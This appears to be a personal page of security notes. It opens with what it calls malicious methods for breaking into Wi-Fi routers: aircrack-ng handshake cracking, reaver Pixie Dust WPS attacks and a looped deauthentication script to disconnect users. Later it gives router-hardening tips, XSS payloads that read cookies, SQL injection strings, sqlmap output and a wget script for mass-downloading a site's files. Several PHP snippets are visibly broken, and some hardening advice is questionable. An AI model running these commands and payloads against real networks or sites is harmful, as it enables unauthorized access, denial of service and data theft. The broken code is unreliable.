Luc Laverdure

Here are 2 malicious methods to access a router and a script to disconnect anyone from a router.

---[Common Steps]---

#kill processes used by the network card:
airmon-ng check kill

# start monitoring
airmon-ng start wlan0

# view info of networks and get BSSID from it
airodump-ng wlan0mon

---[Method 1: Password crack]---

# dump info tracked, .cap is for capture
airodump-ng --ignore-negative-one -c [channel] -w wifi-hack.cap --bssid "[macofrouter]" wlan1mon

# deauth the router, -0 is for all stations, 5 is for 5 times
aireplay-ng --deauth 10 --ignore-negative-one -a [BSSID] wlan0mon [-c station optional] wlan1mon

# wpa handshake (BSSID)

# crack passwd
aircrack-ng [path to cap file] -w [passwordlist]

---[Method 2: Pixie Dust(WPS)]---

# -vv is for very verbose, K is for pixie-dust = [number]
# [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
reaver -i wlan0mon -b [BSSID] -vv -K 1

---[Method 3: Deauthentication of client]---

loop:
 aireplay-ng -0 5 -a [MAC] -c [station mac address] [wlan0mon];
 sleep 3 secs

Protecting your Wi-Fi starts by the Access Point: The Router

You will need to do several router configurations, here is the check list:

1. Change the username for the administrator login of the router
2. Change the password for the administrator
3. Change the SSID (Name identifier of the access point) from the default to a custom one
4. Activate encryption: WPA2 (Don`t use WEP as it's deprecated)
5. Setup your router firewall for active protection
6. Turn off the guest network
7. Update your router firmware
8. Turn off WPS (Wi-Fi protected setup)
9. Turn off SSID broadcasting
10. Disable DHCP
11. Only allow specific MAC addresses to connect to your router
12. Connect your router to a secure VPN

So here we are with user generated content, for example a message to put on a message board.

The easiest way to filter and protect ourselves from XSS injections is by stripping the tags from the output, disabling HTML content completely.

<?php
    $query = $mysqli->query(" SELECT Name FROM City ORDER BY ID LIMIT 5 ");
     while ( $row = mysqli_fetch_array($res, MYSQLI_BOTH) ) {
          $row['Name'] = '<p><?php echo '<a href="#">TEST</a>'; ?></p>'
?>

          <p><?php echo strip_tags($row['Name']); ?></p>
becomes:          
          <p><?php echo 'TEST'; ?></p>

<?php
     }
?>

Cross-site scripting (XSS) is a security breach that allows an attacker to inject a malicious script within our application.

Here is a simple output from our application:

<?php
    $query = $mysqli->query(" SELECT Name FROM City ORDER BY ID LIMIT 5 ");
     while ( $row = mysqli_fetch_array($res, MYSQLI_BOTH) ) {
?>
          <p><?php echo $row['Name']; ?></p>
<?php
     }
?>

As innocent as this output may be, there lies a potential danger of XSS injection here.

What if the row contained HTML, then it can contain scripts!

<?php
    $query = $mysqli->query(" SELECT Name FROM City ORDER BY ID LIMIT 5 ");
     while ( $row = mysqli_fetch_array($res, MYSQLI_BOTH) ) {
?>
          <p><?php echo $row['Name']; ?></p>
becomes:          
          <p><?php echo '<script src="malicious-script.js" type="text/javascript"></script>'; ?></p>
or:
          <p><?php echo '<img src="http://url.to.file.which/not.exist" onerror="alert(document.cookie);" />'; ?></p>

<?php
     }
?>

There are several ways to protect ourselves from an SQL Injection, the important part is to apply the protection on each parameter of the entire application, a single parameter unprotected leaves the application subject to intrusion.

Object oriented style

/* this query with escaped $city will work */
$city = $mysqli->real_escape_string($city);
if ($mysqli->query("INSERT into myCity (Name) VALUES ('$city')")) {
    printf("%d Row inserted.\n", $mysqli->affected_rows);
}

Procedural style

/* this query with escaped $city will work */
$city = mysqli_real_escape_string($link, $city);
if (mysqli_query($link, "INSERT into myCity (Name) VALUES ('$city')")) {
    printf("%d Row inserted.\n", mysqli_affected_rows($link));
}

What happens is that we lock the result to be contained within string parameters.

Entries secured!

Here is Heavy Artillery for SQL Injection attack

sqlmap -u http://luclaverdure.com/wp-admin --time-sec 15

      __H__
 ___ ___[,]_____ ___ ___  {1.1.9#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 07:26:44

[07:26:45] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] y
[07:26:58] [INFO] testing connection to the target URL
sqlmap got a 301 redirect to 'http://luclaverdure.com/wp-admin/'. Do you want to follow? [Y/n] y
[07:27:05] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[07:27:35] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[07:27:35] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
[07:27:48] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
[07:27:48] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[07:28:20] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
[07:28:20] [WARNING] WAF/IPS/IDS specific response can be found in '/tmp/sqlmapnu5FKO3050/sqlmapresponse-2sf3SM'. If you know the details on used protection please report it along with specific response to 'dev@sqlmap.org'
are you sure that you want to continue with further target testing? [y/N] y
[07:28:42] [WARNING] please consider usage of tamper scripts (option '--tamper')
[07:28:42] [INFO] testing if the target URL is stable
[07:28:45] [WARNING] URI parameter '#1*' does not appear to be dynamic
[07:28:46] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[07:28:47] [INFO] testing for SQL injection on URI parameter '#1*'
[07:28:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:28:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[07:28:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[07:29:05] [WARNING] there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests
[07:29:05] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[07:29:36] [CRITICAL] connection timed out to the target URL
[07:29:46] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[07:30:16] [CRITICAL] connection timed out to the target URL
[07:30:26] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[07:30:56] [CRITICAL] connection timed out to the target URL

An SQL Injection is based upon a parameter, of a field from a form in this case.

Take the following simple SQL Query to fetch City Information from the Database.

$mysqli = new mysqli("localhost", "my_user", "my_password", "test");
$result = mysqli_query($link, "SELECT DATABASE()");
$more = $mysqli->query("SELECT * FROM City WHERE x=".$_GET['parameter'].";");

The expected parameter is a number.

However, what if the parameter was:

0 OR 1=1; --

We are in big trouble, this validates the query and comments the rest of the SQL script out of the equation.

You guessed it, the same can be applied to a login form:

'SELECT user WHERE id='.$_GET['id'].' AND password="'.md5($_GET['pwd']).'";

Our SQL Injector:

1' OR 1=1; --

Becoming:

'SELECT user WHERE id='1' OR 1=1; --' AND password="'.md5($_GET['pwd']).'";

And the password was bypassed.

To protect ourselves from leaking important private documents, we need to understand the architecture and directory structure of our project.

Directory Structure:

[chroot]
+  ->  [htdocs]  -> [page.htm]
|                -> [access-private.php]
|                -> [public uploads] -> [public-report1.pdf]
+  ->  [private] -> [private-report.pdf]

Since the uploads folder is within the htdocs folder, it is publicly accessible.

The private folder is at the same level as htdocs, meaning if a user browses to the url:

http://luclaverdure.com/../private/test

The user cannot access the files below or at the same level as htdocs.

If we can't access the file, how can it be viewed by authorized personel?

We'll need to verify if the user is logged in then read the file and output it to the client if the credentials are accepted.

In pseudocode, access-private.php:

if ( is_user_logged_in() && user_has_access_right('private-reports') ) {
    file_get_contents('../private/private-report.pdf', FILE_USE_INCLUDE_PATH);
}

Ensure the apache configurations have chroot at the level below htdocs and voila, it is secret, it is safe

Here is a simple file that enables a user to scan your entire Website for a specific file type and download the file(s) once found

wscanner.sh:

wget -e robots=off -nd -nv -r -A $1 http://$2

Usage:

./wscanner.sh .pdf luclaverdure.com